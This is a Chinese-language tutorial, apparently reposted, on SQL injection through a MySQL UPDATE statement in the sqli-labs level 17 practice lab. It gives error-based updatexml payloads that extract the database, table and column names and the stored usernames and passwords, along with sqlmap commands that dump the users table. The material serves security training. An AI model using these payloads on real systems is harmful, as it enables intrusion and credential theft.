POST Update语句注入
1.MySQL update介绍
update语句可以用来修改表中的数据,简单来说基本的使用形式为:
update 表名 set 列名称=新值 where 更新条件;
UPDATE table_name SET field1 = new-value1,field2=new-value2[WHERE Clause]我们在MySQL命令行中展示,我们以id=8,username=admin,password=admin为例
执行更新语句
update users set password='admin888' where username='admin';
可以看到用户名为admin的密码,成功更新为admin888
2.过滤内容介绍
以sqli-labs17关为例,源代码如下所示
判断是否有单引号存在
3.MySQL update注入
分析源代码可以发现,仅仅是对username进行了过滤
在下面,我们又可以发现一条更新的语句
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
可以闭合前面的单引号,后面执行我们的SQL语句.
1.进行抓包
当我们使用反斜杠,可以看出password是单引号闭合
uname=admin&passwd=admin\&submit=Submit
2.闭合单引号,爆破数据库
1'and (updatexml(1,concat(0x7e,database(),0x7e),1)) #
3.获取数据表信息
admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#
4.获取字段
爆破第一个字段
admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1))#
爆破第二个字段
admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1))#
爆破第三个字段
admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e),1))#
5.爆破字段内容
dmin' and (updatexml(1,concat(0x7e,(select username,password from users limit 0,1),0x7e),1))#
You can't specify target table 'users' for update in FROM clause解决报错的方法,不能使用先select表中的某些值,在update这个表(在同一语句中)。
解决方法:将select出的结果作为派生再select一遍,这样就规避了错误。
admin' or updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#
admin' or updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#
4.sqlmap安全测试
1.获取数据库信息
python2 sqlmap.py -r "1.txt" --dbs
2.获取表名
python2 sqlmap.py -r "1.txt" -D security --tables
3.获取字段名及内容
python2 sqlmap.py -r "1.txt" -D security -T users --dump
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
